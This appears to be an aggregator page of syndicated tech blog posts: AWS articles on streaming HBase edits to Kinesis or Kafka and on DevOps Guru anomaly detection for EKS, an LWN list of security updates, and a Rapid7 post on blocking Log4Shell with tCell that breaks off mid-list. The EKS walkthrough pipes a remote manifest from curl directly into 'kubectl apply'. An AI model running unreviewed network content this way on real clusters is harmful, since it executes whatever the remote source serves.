Stream Apache HBase edits for real-time analytics

Post Syndicated from Amir Shenavandeh original https://aws.amazon.com/blogs/big-data/stream-apache-hbase-edits-for-real-time-analytics/

Apache HBase is a non-relational database. To use the data, applications need to query the database to pull the data and changes from tables. In this post, we introduce a mechanism to stream Apache HBase edits into streaming services such as Apache Kafka or Amazon Kinesis Data Streams. In this approach, changes to data are pushed and queued into a streaming platform such as Kafka or Kinesis Data Streams for real-time processing, using a custom Apache HBase replication endpoint.

We start with a brief technical background on HBase replication and review a use case in which we store IoT sensor data into an HBase table and enrich rows using periodic batch jobs. We demonstrate how this solution enables you to enrich the records in real time and in a serverless way using AWS Lambda functions.

Common scenarios and use cases of this solution are as follows:

  • Auditing data, triggers, and anomaly detection using Lambda
  • Shipping WALEdits via Kinesis Data Streams to Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) to index records asynchronously
  • Triggers on Apache HBase bulk loads
  • Processing streamed data using Apache Spark Streaming, Apache Flink, Amazon Kinesis Data Analytics, or Kinesis analytics
  • HBase edits or change data capture (CDC) replication into other storage platforms, such as Amazon Simple Storage Service (Amazon S3), Amazon Relational Database Service (Amazon RDS), and Amazon DynamoDB
  • Incremental HBase migration by replaying the edits from any point in time, based on configured retention in Kafka or Kinesis Data Streams

This post progresses into some common use cases you might encounter, along with their design options and solutions. We review and expand on these scenarios in separate sections, in addition to the considerations and limits in our application designs.

Introduction to HBase replication

At a very high level, the principle of HBase replication is based on replaying transactions from a source cluster to the destination cluster. This is done by replaying WALEdits or Write Ahead Log entries on the RegionServers of the source cluster into the destination cluster. To explain WALEdits, in HBase, all the mutations in data like PUT or DELETE are written to MemStore of their specific region and are appended to a WAL file as WALEdits or entries. Each WALEdit represents a transaction and can carry multiple write operations on a row. Because the MemStore is an in-memory entity, in case a region server fails, the lost data can be replayed and restored from the WAL files. Having a WAL is optional, and some operations may not require WALs or can request to bypass WALs for quicker writes. For example, records in a bulk load aren’t recorded in WAL.

HBase replication is based on transferring WALEdits to the destination cluster and replaying them so any operation that bypasses WAL isn’t replicated.

When setting up a replication in HBase, a ReplicationEndpoint implementation needs to be selected in the replication configuration when creating a peer, and on every RegionServer, an instance of ReplicationEndpoint runs as a thread. In HBase, a replication endpoint is pluggable for more flexibility in replication and shipping WALEdits to different versions of HBase. You can also use this to build replication endpoints for sending edits to different platforms and environments. For more information about setting up replication, see Cluster Replication.

HBase bulk load replication HBASE-13153

In HBase, bulk loading is a method to directly import HFiles or Store files into RegionServers. This avoids the normal write path and WALEdits. As a result, far less CPU and network resources are used when importing big portions of data into HBase tables.

You can also use HBase bulk loads to recover data when an error or outage causes the cluster to lose track of regions and Store files.

Because bulk loads skip WAL creation, all new records aren’t replicated to the secondary cluster. In HBASE-13153, which is an enhancement, a bulk load is represented as a bulk load event, carrying the location of the imported files. You can activate this by setting hbase.replication.bulkload.enabled to true and setting hbase.replication.cluster.id to a unique value as a prerequisite.

Custom streaming replication endpoint

We can use HBase’s pluggable endpoints to stream records into platforms such as Kinesis Data Streams or Kafka. Transferred records can be consumed by Lambda functions, processed by a Spark Streaming application or Apache Flink on Amazon EMR, Kinesis Data Analytics, or any other big data platform.

In this post, we demonstrate an implementation of a custom replication endpoint that allows replicating WALEdits in Kinesis Data Streams or Kafka topics.

In our example, we built upon the BaseReplicationEndpoint abstract class, inheriting the ReplicationEndpoint interface.

The main method to implement and override is the replicate method. This method replicates a set of items it receives every time it’s called and blocks until all those records are replicated to the destination.

For our implementation and configuration options, see our GitHub repository.

Use case: Enrich records in real time

We now use the custom streaming replication endpoint implementation to stream HBase edits to Kinesis Data Streams.

The provided AWS CloudFormation template demonstrates how we can set up an EMR cluster with replication to either Kinesis Data Streams or Apache Kafka and consume the replicated records, using a Lambda function to enrich data asynchronously, in real time. In our sample project, we launch an EMR cluster with an HBase database. A sample IoT traffic generator application runs as a step in the cluster and puts records, containing a registration number and an instantaneous speed, into a local HBase table. Records are replicated in real time into a Kinesis stream or Kafka topic based on the selected option at launch, using our custom HBase replication endpoint. When the step starts putting the records into the stream, a Lambda function is provisioned and starts digesting records from the beginning of the stream and catches up with the stream. The function calculates a score per record, based on a formula on variation from minimum and maximum speed limits in the use case, and persists the result as a score qualifier into a different column family, out of replication scope in the source table, by running HBase puts on RowKey.

The following diagram illustrates this architecture.

To launch our sample environment, you can use our template on GitHub.

The template creates a VPC, public and private subnets, Lambda functions to consume records and prepare the environment, an EMR cluster with HBase, and a Kinesis data stream or an Amazon Managed Streaming for Apache Kafka (Amazon MSK) cluster depending on the selected parameters when launching the stack.

Architectural design patterns

Traditionally, Apache HBase tables are considered as data stores, where consumers get or scan the records from tables. It’s very common in modern databases to react to database logs or CDC for real-time use cases and triggers. With our streaming HBase replication endpoint, we can project table changes into message delivery systems like Kinesis Data Streams or Apache Kafka.

We can trigger Lambda functions to consume messages and records from Apache Kafka or Kinesis Data Streams to consume the records in a serverless design or the wider Amazon Kinesis ecosystems such as Kinesis Data Analytics or Amazon Kinesis Data Firehose for delivery into Amazon S3. You could also pipe in Amazon OpenSearch Service.

A wide range of consumer ecosystems, such as Apache Spark, AWS Glue, and Apache Flink, is available to consume from Kafka and Kinesis Data Streams.

Let’s review few other common use cases.

Index HBase rows

Apache HBase rows are retrievable by RowKey. Writing a row into HBase with the same RowKey overwrites or creates a new version of the row. To retrieve a row, it needs to be fetched by the RowKey or a range of rows needs to be scanned if the RowKey is unknown.

In some use cases, scanning the table for a specific qualifier or value is expensive if we index our rows in another parallel system like Elasticsearch asynchronously. Applications can use the index to find the RowKey. Without this solution, a periodic job has to scan the table and write them into an indexing service like Elasticsearch to hydrate the index, or the producing application has to write in both HBase and Elasticsearch directly, which adds overhead to the producer.

Enrich and audit data

A very common use case for HBase streaming endpoints is enriching data and storing the enriched records in a data store, such as Amazon S3 or RDS databases. In this scenario, a custom HBase replication endpoint streams the records into a message distribution system such as Apache Kafka or Kinesis Data Streams. Records can be serialized, using the AWS Glue Schema Registry for schema validation. A consumer on the other end of the stream reads the records, enriches them, and validates against a machine learning model in Amazon SageMaker for anomaly detection. The consumer persists the records in Amazon S3 and potentially triggers an alert using Amazon Simple Notification Service (Amazon SNS). Stored data on Amazon S3 can be further digested on Amazon EMR, or we can create a dashboard on Amazon QuickSight, interfacing Amazon Athena for queries.

The following diagram illustrates our architecture.

Store and archive data lineage

Apache HBase comes with the snapshot feature. You can freeze the state of tables into snapshots and export them to any distributed file system like HDFS or Amazon S3. Recovering snapshots restores the entire table to the snapshot point.

Apache HBase also supports versioning at the row level. You can configure column families to keep row versions, and the default versioning is based on timestamps.

However, when using this approach to stream records into Kafka or Kinesis Data Streams, records are retained inside the stream, and you can partially replay a period. Recovering snapshots only recovers up to the snapshot point and the future records aren’t present.

In Kinesis Data Streams, by default records of a stream are accessible for up to 24 hours from the time they are added to the stream. This limit can be increased to up to 7 days by enabling extended data retention, or up to 365 days by enabling long-term data retention. See Quotas and Limits for more information.

In Apache Kafka, record retention has virtually no limits based on available resources and disk space configured on the Kafka cluster, and can be configured by setting log.retention.

Trigger on HBase bulk load

The HBase bulk load feature uses a MapReduce job to output table data in HBase’s internal data format, and then directly loads the generated Store files into the running cluster. Using bulk load uses less CPU and network resources than loading via the HBase API, as HBase bulk load bypasses WALs in the write path and the records aren’t seen by replication. However, since HBASE-13153, you can configure HBase to replicate a meta record as an indication of a bulk load event.

A Lambda function processing replicated WALEdits can listen to this event to trigger actions, such as automatically refreshing a read replica HBase cluster on Amazon S3 whenever a bulk load happens. The following diagram illustrates this workflow.

Considerations for replication into Kinesis Data Streams

Kinesis Data Streams is a massively scalable and durable real-time data streaming service. Kinesis Data Streams can continuously capture gigabytes of data per second from hundreds of thousands of sources with very low latency. Kinesis is fully managed and runs your streaming applications without requiring you to manage any infrastructure. It’s durable, because records are synchronously replicated across three Availability Zones, and you can increase data retention to 365 days.

When considering Kinesis Data Streams for any solution, it’s important to consider service limits. For instance, as of this writing, the maximum size of the data payload of a record before base64-encoding is up to 1 MB, so we must make sure the records or serialized WALEdits remain within the Kinesis record size limit. To be more efficient, you can enable the hbase.replication.compression-enabled attribute to GZIP compress the records before sending them to the configured stream sink.

Kinesis Data Streams retains the order of the records within the shards as they arrive, and records can be read or processed in the same order. However, in this sample custom replication endpoint, a random partition key is used so that the records are evenly distributed between the shards. We can also use a hash function to generate a partition key when putting records into the stream, for example based on the Region ID so that all the WALEdits from the same Region land in the same shard and consumers can assume Region locality per shards.

For delivering records in KinesisSinkImplemetation, we use the Amazon Kinesis Producer Library (KPL) to put records into Kinesis data streams. The KPL simplifies producer application development; we can achieve high write throughput to a Kinesis data stream. We can use the KPL in either synchronous or asynchronous use cases. We suggest using the higher performance of the asynchronous interface unless there is a specific reason to use synchronous behavior. KPL is very configurable and has retry logic built in. You can also perform record aggregation for maximum throughput. In KinesisSinkImplemetation, by default records are asynchronously replicated to the stream. We can change to synchronous mode by setting hbase.replication.kinesis.syncputs to true. We can enable record aggregation by setting hbase.replication.kinesis.aggregation-enabled to true.

The KPL can incur an additional processing delay because it buffers records before sending them to the stream based on a user-configurable attribute of RecordMaxBufferedTime. Larger values of RecordMaxBufferedTime results in higher packing efficiencies and better performance. However, applications that can’t tolerate this additional delay may need to use the AWS SDK directly.

Kinesis Data Streams and the Kinesis family are fully managed and easily integrate with the rest of the AWS ecosystem with minimum development effort with services such as the AWS Glue Schema Registry and Lambda. We recommend considering Kinesis Data Streams for low-latency, real-time use cases on AWS.

Considerations for replication into Apache Kafka

Apache Kafka is a high-throughput, scalable, and highly available open-source distributed event streaming platform used by thousands of companies for high-performance data pipelines, streaming analytics, data integration, and mission-critical applications.

AWS offers Amazon MSK as a fully managed Kafka service. Amazon MSK provides the control plane operations and runs open-source versions of Apache Kafka. Existing applications, tooling, and plugins from partners and the Apache Kafka community are supported without requiring changes to application code.

You can configure this sample project for Apache Kafka brokers directly or just point towards an Amazon MSK ARN for replication.

Although there is virtually no limit on the size of the messages in Kafka, the default maximum message size is set to 1 MB by default, so we must make sure the records, or serialized WALEdits, remain within the maximum message size for topics.

The Kafka producer tries to batch records together whenever possible to limit the number of requests for more efficiency. This is configurable by setting batch.size, linger.ms, and delivery.timeout.ms.

In Kafka, topics are partitioned, and partitions are distributed between different Kafka brokers. This distributed placement allows for load balancing of consumers and producers. When a new event is published to a topic, it’s appended to one of the topic’s partitions. Events with the same event key are written to the same partition, and Kafka guarantees that any consumer of a given topic partition can always read that partition’s events in exactly the same order as they were written. KafkaSinkImplementation uses a random partition key to distribute the messages evenly between the partitions. This could be based on a heuristic function, for example based on Region ID, if the order of the WALEdits or record locality is important by the consumers.

Semantic guarantees

Like any streaming application, it’s important to consider semantic guarantee from the producer of messages, to acknowledge or fail the status of delivery of messages in the message queue and checkpointing on the consumer’s side. Based on our use cases, we need to consider the following:

  • At most once delivery – Messages are never delivered more than once, and there is a chance of losing messages
  • At least once delivery – Messages can be delivered more than once, with no loss of messages
  • Exactly once delivery – Every message is delivered only once, and there is no loss of messages

After changes are persisted as WALs and in MemStore, the replicate method in ReplicationEnpoint is called to replicate a collection of WAL entries and returns a Boolean (true/false) value. If the returned value is true, the entries are considered successfully replicated by HBase and the replicate method is called for the next batch of WAL entries. Depending on configuration, both KPL and Kafka producers might buffer the records for longer if configured for asynchronous writes. Failures can cause loss of entries, retries, and duplicate delivery of records to the stream, which could be determinantal for synchronous or asynchronous message delivery.

If our operations aren’t idempotent, you can checkpoint or check for unique sequence numbers on the consumer side. For a simple HBase record replication, RowKey operations are idempotent and they carry a timestamp and sequence ID.

Summary

Replication of HBase WALEdits into streams is a powerful tool that you can use in multiple use cases and in combination with other AWS services. You can create practical solutions to further process records in real time, audit the data, detect anomalies, set triggers on ingested data, or archive data in streams to be replayed on other HBase databases or storage services from a point in time. This post outlined some common use cases and solutions, along with some best practices when implementing your custom HBase streaming replication endpoints.

Review, clone, and try our HBase replication endpoint implementation from our GitHub repository and launch our sample CloudFormation template.

We like to learn about your use cases. If you have questions or suggestions, please leave a comment.


About the Authors

Amir Shenavandeh is a Senior Hadoop systems engineer and Amazon EMR subject matter expert at Amazon Web Services. He helps customers with architectural guidance and optimization. He leverages his experience to help people bring their ideas to life, focusing on distributed processing and big data architectures.

Maryam Tavakoli is a Cloud Engineer and Amazon OpenSearch subject matter expert at Amazon Web Services. She helps customers with their Analytics and Streaming workload optimization and is passionate about solving complex problems with simplistic user experience that can empower customers to be more productive.

Automate Container Anomaly Monitoring of Amazon Elastic Kubernetes Service Clusters with Amazon DevOps Guru

Post Syndicated from Rahul Sharad Gaikwad original https://aws.amazon.com/blogs/devops/automate-container-anomaly-monitoring-of-amazon-elastic-kubernetes-service-clusters-with-amazon-devops-guru/

Observability in a container-centric environment presents new challenges for operators due to the increasing number of abstractions and supporting infrastructure. In many cases, organizations can have hundreds of clusters and thousands of services/tasks/pods running concurrently. This post will demonstrate new features in Amazon DevOps Guru to help simplify and expand the capabilities of the operator. The features include grouping anomalies by metric and container cluster to improve context and simplify access and support for additional Amazon CloudWatch Container Insight metrics. An example of these capabilities in action would be that Amazon DevOps Guru can now identify anomalies in CPU, memory, or networking within Amazon Elastic Kubernetes Service (EKS), notifying the operators and letting them more easily navigate to the affected cluster to examine the collected data.

Amazon DevOps Guru offers a fully managed AIOps platform service that lets developers and operators improve application availability and resolve operational issues faster. It minimizes manual effort by leveraging machine learning (ML) powered recommendations. Its ML models take advantage of the expertise of AWS in operating highly available applications for the world’s largest ecommerce business for over 20 years. DevOps Guru automatically detects operational issues, predicts impending resource exhaustion, details likely causes, and recommends remediation actions.

Solution Overview

In this post, we will demonstrate the new Amazon DevOps Guru features around cluster grouping and additionally supported Amazon EKS metrics. To demonstrate these features, we will show you how to create a Kubernetes cluster, instrument the cluster using AWS Distro for OpenTelemetry, and then configure Amazon DevOps Guru to automate anomaly detection of EKS metrics. A previous blog provides detail on the AWS Distro for OpenTelemetry collector that is employed here.

Prerequisites

EKS Cluster Creation

We employ the eksctl CLI tool to create an Amazon EKS. Using eksctl, you can provide details on the command line or specify a manifest file. The following manifest is used to create a single managed node using Amazon Elastic Compute Cloud (EC2), and this will be created and constrained to the specified Region via entry metadata/region and Availability Zones via the managedNodeGroups/availabilityZones entry. By default, this will create a new VPC with eight subnets.

# An example of ClusterConfig object using Managed Nodes
---
    apiVersion: eksctl.io/v1alpha5
    kind: ClusterConfig

    metadata:
      name: devopsguru-eks-cluster
      region: <SPECIFY_REGION_HERE>
      version: "1.21"

    availabilityZones: ["<FIRST_AZ>","<SECOND_AZ>"]
    managedNodeGroups:
      - name: managed-ng-private
        privateNetworking: true
        instanceType: t3.medium
        minSize: 1
        desiredCapacity: 1
        maxSize: 6
        availabilityZones: ["<SPECIFY_AVAILABILITY_ZONE(S)_HERE"]
        volumeSize: 20
        labels: {role: worker}
        tags:
          nodegroup-role: worker
    cloudWatch:
      clusterLogging:
        enableTypes:
          - "api"
  • To create an Amazon EKS cluster using eksctl and a manifest file, we use eksctl create as shown below. Note that this step will take 10 – 15 minutes to establish the cluster.
$ eksctl create cluster -f devopsguru-managed-node.yaml
2021-10-13 10:44:53 [i] eksctl version 0.69.0
…
2021-10-13 11:04:42 [✔] all EKS cluster resources for "devopsguru-eks-cluster" have been created
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:44 [i] waiting for at least 1 node(s) to become ready in "managed-ng-private"
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:47 [i] kubectl command should work with "/Users/<user>/.kube/config"
  • Once this is complete, you can use kubectl, the Kubernetes CLI, to access the managed nodes that are running.
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
<ip>.<region>.compute.internal Ready <none> 76m v1.21.4-eks-033ce7e

AWS Distro for OpenTelemetry Collector Installation

We will use AWS Distro for OpenTelemetry Collector to extract metrics from a pod running in Amazon EKS. This will collect metrics within the Kubernetes cluster and surface them to Amazon CloudWatch. We start by defining a policy to allow access. The following information comes from the post here.

Attach the CloudWatchAgentServerPolicy IAM Policy to worker node

  • Open the Amazon EC2 console.
  • Select one of the worker node instances, and choose the IAM role in the description.
  • On the IAM role page, choose Attach policies.
  • In the list of policies, select the check box next to CloudWatchAgentServerPolicy. You can use the search box to find this policy.
  • Choose Attach policies.

Deploy AWS OpenTelemetry Collector on Amazon EKS

Next, you will deploy the AWS Distro for OpenTelemetry using a GitHub hosted manifest.

  • Deploy the artifact to the Amazon EKS cluster using the following command:
$ curl https://raw.githubusercontent.com/aws-observability/aws-otel-collector/main/deployment-template/eks/otel-container-insights-infra.yaml | kubectl apply -f -
  • View the resources in the aws-otel-eks namespace.
$ kubectl get pods -l name=aws-otel-eks-ci -n aws-otel-eks
NAME READY STATUS RESTARTS AGE
aws-otel-eks-ci-jdf2w 1/1 Running 0 107m

View Container Insight Metrics in Amazon CloudWatch

Access Amazon CloudWatch and select Metrics, All metrics to view the published metrics. Under Custom Namespaces, ContainerInsights is selectable. Under this, one can view metrics at the cluster, node, pod, namespace, and service granularity. The following example shows pod level metrics of CPU:

The AWS Console with Amazon Cloudwatch Container Insights Pod Level CPU Utilization.

Amazon Simple Notification Service

It is necessary to allow Amazon DevOps Guru access to Amazon SNS in order for Amazon SNS to publish events. During the setup process, an Amazon SNS Topic is created, and the following resource policy is applied:

{
    "Sid": "DevOpsGuru-added-SNS-topic-permissions",
    "Effect": "Allow",
    "Principal": {
        "Service": "region-id.devops-guru.amazonaws.com"
    },
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:region-id:topic-owner-account-id:my-topic-name",
    "Condition" : {
      "StringEquals" : {
        "AWS:SourceArn": "arn:aws:devops-guru:region-id:topic-owner-account-id:channel/devops-guru-channel-id",
        "AWS:SourceAccount": "topic-owner-account-id"
    }
  }
}

Amazon DevOps Guru

Amazon DevOps Guru can now be leveraged to monitor the Amazon EKS cluster and Managed Node Group. Select Amazon DevOps Guru, and select Get started as shown in the following figure to do this.

The Amazon DevOps Guru service via the AWS Console.

Once selected, the Get started console displays, letting you specify the IAM role for DevOps guru to access the appropriate resources.

The Get started dialog for Amazon DevOps Guru including instructions on how the service operates, IAM Role Permissions and Amazon DevOps Guru analysis coverage.

Under the Amazon DevOps Guru analysis coverage, Choose later is selected. This will let us specify the CloudFormation stacks to monitor. Select Create a new SNS topic, and provide a name. This will be used to collect notifications and allow for subscribers to then be notified. Select Enable when complete.

The Amazon DevOps Guru analysis coverage allowing the user to select all resources in a region or to choose later. In addition the image shows the dialog that requests the user specify an Amazon SNS topic for notification when insights occur.

On the Manage DevOps Guru analysis coverage, select Analyze all AWS resources in the specified CloudFormation stacks in this Region. Then, select the cluster and managed node group AWS CloudFormation stacks so that DevOps Guru can monitor Amazon EKS.

A dialog where the user is able to specify the AWS CloudFormation stacks in a region for analysis coverage. Two stacks are select including the eks cluster and eks cluster managed node group.

Once this is selected, the display will update indicating that two CloudFormation stacks were added.

Amazon DevOps Guru Settings including DevOps Guru analysis coverage and Amazon SNS notifications.

Amazon DevOps Guru will finally start analysis for those two stacks. This will take several hours to collect data and to identify normal operating conditions. Once this process is complete, the Dashboard will display that those resources have been analyzed, as shown in the following figure.

The completed analysis by DevOps guru of the two AWS Cloudformation stacks indicating a healthy status for both.

Enable Encryption on Amazon SNS Topic

The Amazon SNS Topic created by Amazon DevOps Guru will not enable encryption by default. It is important to enable this feature to encrypt notifications at rest. Go to Amazon SNS, select the topic that is created and then Edit topic. Open the Encryption dialog box and enable encryption as shown in the following figure, specifying an alias, or accepting the default.

The Encryption dialog for Amazon SNS topic when it is Edited.

Deploy Sample Application on Amazon EKS To Trigger Insights

You will employ a sample application that is part of the AWS Distro for OpenTelemetry Collector to simulate failure. Using the following manifest, you will deploy a sample application that has pod resource limits for memory and CPU shares. These limits are artificially low and insufficient for the pod to run. The pod will exceed memory and will be identified for eviction by Amazon EKS. When it is evicted, it will attempt to be redeployed per the manifest requirement for a replica of one. In turn, this will repeat the process and generate memory and pod restart errors in Amazon CloudWatch. For this example, the deployment was left for over an hour, thereby causing the pod failure to repeat numerous times. The following is the manifest that you will create on the filesystem.

kind: Deployment
apiVersion: apps/v1
metadata:
  name: java-sample-app
  namespace: aws-otel-eks
  labels:
    name: java-sample-app
spec:
  replicas: 1
  selector:
    matchLabels:
      name: java-sample-app
  template:
    metadata:
      labels:
        name: java-sample-app
    spec:
      containers:
        - name: aws-otel-emitter
          image: aottestbed/aws-otel-collector-java-sample-app:0.9.0
          resources:
            limits:
              memory: "128Mi"
              cpu: "200m"
          ports:
          - containerPort: 4567
          env:
          - name: OTEL_OTLP_ENDPOINT
            value: "localhost:4317"
          - name: OTEL_RESOURCE_ATTRIBUTES
            value: "service.namespace=AWSObservability,service.name=CloudWatchEKSService"
          - name: S3_REGION
            value: "us-east-1"
          imagePullPolicy: Always

To deploy the application, use the following command:

$ kubectl apply -f <manifest file name>
deployment.apps/java-sample-app created

Scenario: Improved context from DevOps Guru Container Cluster Grouping and Increased Metrics

For our scenario, Amazon DevOps Guru is monitoring additional Amazon CloudWatch Container Insight Metrics for EKS. The following figure shows the flow of information and eventual notification of the operator, so that they can examine the Amazon DevOps Guru Insight. Starting at step 1, the container agent (AWS Distro for OpenTelemetry) forwards container metrics to Amazon CloudWatch. In step 2, Amazon DevOps Guru is continually consuming those metrics and performing anomaly detection. If an anomaly is detected, then this generates an Insight, thereby triggering Amazon SNS notification as shown in step 3. In step 4, the operators access Amazon DevOps Guru console to examine the insight. Then, the operators can leverage the new user interface capability displaying which cluster, namespace, and pod/service is impacted along with correlated Amazon EKS metric(s).

 The flow of information and eventual notification of the operator, so that they can examine the Amazon DevOps Guru Insight. Starting at step 1, the container agent (AWS Distro for OpenTelemetry) forwards container metrics to Amazon CloudWatch. In step 2, Amazon DevOps Guru is continually consuming those metrics and performing anomaly detection. If an anomaly is detected, then this generates an Insight, thereby triggering Amazon SNS notification as shown in step 3. In step 4, the operators access Amazon DevOps Guru console to examine the insight. Then, the operators can leverage the new user interface capability displaying which cluster, namespace, and pod/service is impacted along with correlated Amazon EKS metric(s).

New EKS Container Metrics in DevOps Guru

As part of the release, the following pod and node metrics are now tracked by DevOps Guru:

  • pod_number_of_container_restarts – number of times that a pod is restarted (e.g., image pull issues, container failure).
  • pod_memory_utilization_over_pod_limit – memory that exceeds the pod limit called out in resource memory limits.
  • pod_cpu_utilization_over_pod_limit – CPU shares that exceed the pod limit called out in resource CPU limits.
  • pod_cpu_utilization – percent CPU Utilization within an active pod.
  • pod_memory_utilization – percent memory utilization within an active pod.
  • node_network_total_bytes – total bytes over the network interface for the managed node (e.g., EC2 instance)
  • node_filesystem_utilization – percent file system utilization for the managed node (e.g., EC2 instance).
  • node_cpu_utilization – percent CPU Utilization within a managed node (e.g., EC2 instance).
  • node_memory_utilization – percent memory utilization within a managed node (e.g., EC2 instance).

Operator Scenario

The Kubernetes Operator in the following figure is informed of an insight via Amazon SNS. The Amazon SNS message content appears in the following code, showing the originator and information identifying the InsightDescription, InsightSeverity, name of the container metric, and the Pod / EKS Cluster:

{
 "AccountId": "XXXXXXX",
 "Region": "<REGION>",
 "MessageType": "NEW_INSIGHT",
 "InsightId": "ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
 "InsightUrl": "https://<REGION>.console.aws.amazon.com/devops-guru/#/insight/reactive/ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
 "InsightType": "REACTIVE",
 "InsightDescription": "ContainerInsights pod_number_of_container_restarts Anomalous In Stack eksctl-devopsguru-eks-cluster-cluster",
 "InsightSeverity": "high",
 "StartTime": 1636147920000,
 "Anomalies": [
 {
 "Id": "ALAGy5sIITl9e6i66eo6rKQAAAF88gInwEVT2WRSTV5wSTP8KWDzeCYALulFupOQ",
 "StartTime": 1636147800000,
 "SourceDetails": [
 {
 "DataSource": "CW_METRICS",
 "DataIdentifiers": {
 "name": "pod_number_of_container_restarts",
 "namespace": "ContainerInsights",
 "period": "60",
 "stat": "Average",
 "unit": "None",
 "dimensions": "{\"PodName\":\"java-sample-app\",\"ClusterName\":\"devopsguru-eks-cluster\",\"Namespace\":\"aws-otel-eks\"}"
 }
 ....
 "awsInsightSource": "aws.devopsguru"
}

Amazon DevOps Guru Console collects the insights under the Insights selection as shown in the following figure. Select Insights to view the details.

Amazon DevOps Guru Insights. An insight is displayed with a status of Ongoing and Severity of High.

Aggregated Metrics provides the identification of the EKS Container Metrics that have errored. In this case, pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts.

Aggregated Metrics panel with pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts for the Amazon EKS cluster names devopsguru-eks-cluster. Graphically a timeline including time and date is displayed conveying the length of the anomaly.

Further details can be identified by selecting and expanding each insight as shown in the following figure.

Displays the ability to expand the cluster metrics providing further information on the PodName, Namespace and ClusterName. Furthermore, a search bar is provided to search on name, stack or service name.

Note that the display provides information around the Cluster, PodName, and Namespace. This helps operators maintaining large numbers of EKS Clusters to quickly isolate the offending Pod, its operating Namespace, and EKS Cluster to which it belongs. A search bar provides further filtering to isolate the name, stack, or service name displayed.

Cleaning Up

Follow the steps to delete the resources to prevent additional charges being posted to your account.

Amazon EKS Cluster Cleanup

Follow these steps to detach the customer managed policy and delete the cluster.

  • Detach customer managed policy, AWSDistroOpenTelemetryPolicy, via IAM Console.
  • Delete cluster using eksctl.
$ eksctl delete cluster devopsguru-eks-cluster --region <region>
2021-10-13 14:08:28 [i] eksctl version 0.69.0
2021-10-13 14:08:28 [i] using region <region>
2021-10-13 14:08:28 [i] deleting EKS cluster "devopsguru-eks-cluster"
2021-10-13 14:08:30 [i] will drain 0 unmanaged nodegroup(s) in cluster "devopsguru-eks-cluster"
2021-10-13 14:08:32 [i] deleted 0 Fargate profile(s)
2021-10-13 14:08:33 [✔] kubeconfig has been updated
2021-10-13 14:08:33 [i] cleaning up AWS load balancers created by Kubernetes objects of Kind Service or Ingress
2021-10-13 14:09:02 [i] 2 sequential tasks: { delete nodegroup "managed-ng-private", delete cluster control plane "devopsguru-eks-cluster" [async] }
2021-10-13 14:09:02 [i] will delete stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private"
2021-10-13 14:09:02 [i] waiting for stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private" to get deleted
2021-10-13 14:12:30 [i] will delete stack "eksctl-devopsguru-eks-cluster-cluster"
2021-10-13 14:12:30 [✔] all cluster resources were deleted

Conclusion

In the previous scenarios, demonstration of the new cluster organization and additional container metrics was performed. Both of these features further simplify and expand the ability for an operator to more easily identify issues within a container cluster when Amazon DevOps Guru detects anomalies. You can start building your own solutions that employ Amazon CloudWatch Agent / AWS Distro for OpenTelemetry Agent and Amazon DevOps Guru by reading the documentation. This provides a conceptual overview and practical examples to help you understand the features provided by Amazon DevOps Guru and how to use them.

About the authors

Rahul Sharad Gaikwad

Rahul Sharad Gaikwad is a Lead Consultant – DevOps with AWS. He helps customers and partners on their Cloud and DevOps adoption journey. He is passionate about technology and enjoys collaborating with customers. In his spare time, he focuses on his PhD Research work. He also enjoys gymming and spending time with his family.

Leo Da Silva

Leo Da Silva is a Partner Solution Architect Manager at AWS and uses his knowledge to help customers better utilize cloud services and technologies. Over the years, he had the opportunity to work in large, complex environments, designing, architecting, and implementing highly scalable and secure solutions to global companies. He is passionate about football, BBQ, and Jiu Jitsu — the Brazilian version of them all.

Chris Riley

Chris Riley is a Senior Solutions Architect working with Strategic Accounts providing support in Industry segments including Healthcare, Financial Services, Public Sector, Automotive and Manufacturing via Managed AI/ML Services, IoT and Serverless Services.

Security updates for Wednesday

Post Syndicated from original https://lwn.net/Articles/878749/rss

Security updates have been issued by Fedora (libopenmpt), openSUSE (icu.691, log4j, nim, postgresql10, and xorg-x11-server), Red Hat (idm:DL1), SUSE (gettext-runtime, icu.691, runc, storm, storm-kit, and xorg-x11-server), and Ubuntu (xorg-server, xorg-server-hwe-18.04, xwayland).

How to Protect Your Applications Against Log4Shell With tCell

Post Syndicated from Bria Grangard original https://blog.rapid7.com/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/

How to Protect Your Applications Against Log4Shell With tCell

By now, we’re sure you’re familiar with all things Log4Shell – but we want to make sure we share how to protect your applications. Applications are a critical part of any organization’s attack surface, and we’re seeing thousands of Log4Shell attack attempts in our customers’ environments every hour. Let’s walk through the various ways tCell can help our customers protect against Log4Shell attacks.

1. Monitor for any Log4Shell attack attempts

tCell is a web application and API protection solution that has traditional web application firewall monitoring capabilities such as monitoring attacks. Over the weekend, we launched a new App Firewall detection for all tCell customers. This means tCell customers can leverage our App Firewall functionality to determine if any Log4Shell attack attempts have taken place. From there, customers can also drill in to more information on the events that took place. We’ve created a video to walk you through how to detect an Log4Shell attack attempts using the App Firewall feature in tCell in the video below.



How to Protect Your Applications Against Log4Shell With tCell

As a reminder, customers will need to make sure they have deployed the JVM agent on their apps to begin monitoring their applications’ activity. Make sure to check out our Quick Start Guide if you need help setting up tCell.

2. Block against Log4Shell attacks

Monitoring is great, but what you may be looking for is something that protects your application by blocking Log4Shell attack attempts. In order to do this, we’ve added a default pattern (tc-cmdi-4) for customers to block against. Below is a video on how to set up this custom block rule, or reach out to the tCell team if you need any assistance rolling this out at large.



How to Protect Your Applications Against Log4Shell With tCell

As research continues and new patterns are identified, we will provide updates to tc-cdmi-4 to improve coverage. Customers have already noted how the new default pattern is providing more protection coverage than yesterday.

3. Identify vulnerable packages (such as CVE 2021-44228)

